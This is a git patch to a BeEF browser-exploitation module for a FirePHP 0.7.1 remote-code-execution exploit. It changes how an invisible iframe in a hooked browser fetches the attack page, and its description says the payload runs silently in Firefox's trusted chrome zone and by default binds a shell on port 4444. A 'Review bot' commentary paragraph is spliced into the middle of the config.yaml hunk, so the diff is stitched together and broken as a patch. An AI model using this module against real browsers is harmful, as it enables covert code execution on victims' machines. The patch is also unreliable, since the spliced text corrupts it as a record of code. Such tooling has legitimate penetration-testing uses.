From dbeedb1d927532f8a847725f5dc0e0601791e377 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 10 May 2014 09:50:38 +0000
Subject: [PATCH] Use beef.net for URI
---
 modules/exploits/firephp/command.js | 2 +-
 modules/exploits/firephp/config.yaml | 2 +-
 modules/exploits/firephp/module.rb | 13 +------------
 3 files changed, 3 insertions(+), 14 deletions(-)
diff --git a/modules/exploits/firephp/command.js b/modules/exploits/firephp/command.js
index cd0bb84d0..4272f9dd7 100644
--- a/modules/exploits/firephp/command.js
+++ b/modules/exploits/firephp/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
 // detect firebug
 if (window.console && (window.console.firebug || window.console.exception)) {
 var firephp_<%= @command_id %> = beef.dom.createInvisibleIframe();
- firephp_<%= @command_id %>.src = "<%= @beef_url %>/firephp";
+ firephp_<%= @command_id %>.src = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/firephp";
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 } else {
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=Module did not run. Firebug is not open in the hooked browser.");
diff --git a/modules/exploits/firephp/config.yaml b/modules/exploits/firephp/config.yaml
index efa0eacc9..ba97cfdd7 100644
--- a/modules/exploits/firephp/config.yaml
+++ b/modules/exploits/firephp/config.yaml
@@ -12,7 +12,7 @@ beef:
 enable: true
 category: "Exploits"
 name: "Firephp 0.7.1 RCE"
- description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.
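Review bot: The added `.src` line in command.js assembles the iframe URL by bare string concatenation from `beef.net.httpproto`, `beef.net.host` and `beef.net.port`, and nothing in the file says where those values come from or what happens when one of them is empty. Since the same commit deletes `self.options` (and with it the `beef_url` value) from module.rb, a short comment above the assignment would record the new behaviour, for example `// /firephp is requested from the BeEF origin held in beef.net.*; no longer a module option`. An empty port or an IPv6 literal host would presumably yield a malformed URL here, so building the base in a local variable and checking it before assigning `.src` may be worth it. The description text in config.yaml still shows `http://[BeEF]/firephp`, although the scheme now follows `beef.net.httpproto`. The enclosing `beef.execute` callback starts and ends outside the hunk.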

This module forces the browser to load '/firephp' on the public BeEF interface.

The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.

Note: Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.
See 'modules/exploits/firephp/payload.js'"
+ description: "Exploit FirePHP <= 0.7.1 to execute arbitrary JavaScript within the trusted 'chrome://' zone.

This module forces the browser to load '/firephp' on the BeEF server.

The payload is executed silently once the user moves the mouse over the array returned for 'http://[BeEF]/firephp' in Firebug.

Note: Use msfpayload to generate JavaScript payloads. The default payload binds a shell on port 4444.
See 'modules/exploits/firephp/payload.js'"
 authors: ["Wireghoul", "bcoles"]
 target:
 user_notify: ["FF"]
diff --git a/modules/exploits/firephp/module.rb b/modules/exploits/firephp/module.rb
index 41999a8cb..e5404974d 100644
--- a/modules/exploits/firephp/module.rb
+++ b/modules/exploits/firephp/module.rb
@@ -3,7 +3,7 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 ###
-# Exploit: http://www.justanotherhacker.com/advisories/jahx132.html
+# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
 ###
 class Firephp_code_exec < BeEF::Core::Command
@@ -52,17 +52,6 @@ class Firephp_code_exec < BeEF::Core::Command
 )
 end
- def self.options
- configuration = BeEF::Core::Configuration.instance
- proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
- beef_host = configuration.get("beef.http.public") || configuration.get("beef.http.host")
- beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
- url = "#{proto}://#{beef_host}:#{beef_port}"
- return [
- { 'name' => 'beef_url', 'description' => 'BeEF interface URL', 'ui_label' => 'BeEF URL', 'value' => url, 'width' => '200px' }
- ]
- end
-
 def post_execute
 save({'result' => @datastore['result']})
 end